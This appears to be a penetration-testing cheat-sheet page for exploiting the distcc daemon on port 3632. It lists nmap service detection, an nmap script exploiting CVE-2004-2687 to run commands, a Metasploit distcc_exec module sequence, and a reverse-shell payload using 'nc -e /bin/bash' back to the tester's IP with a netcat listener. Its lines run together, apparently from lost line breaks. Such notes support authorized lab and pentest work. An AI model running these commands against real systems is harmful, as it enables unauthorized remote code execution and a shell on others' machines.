Distcc - Port 3632
Last updated
nmap -p 3632 <target>
PORT STATE SERVICE
3632/tcp open distccdnmap -sV -p 3632 <target>nmap -p 3632 <target> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target>
set RPORT 3632
set CMD id
runnmap -p 3632 <target> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='nc -e /bin/bash <your_ip> <your_port>'"nc -lvnp <your_port>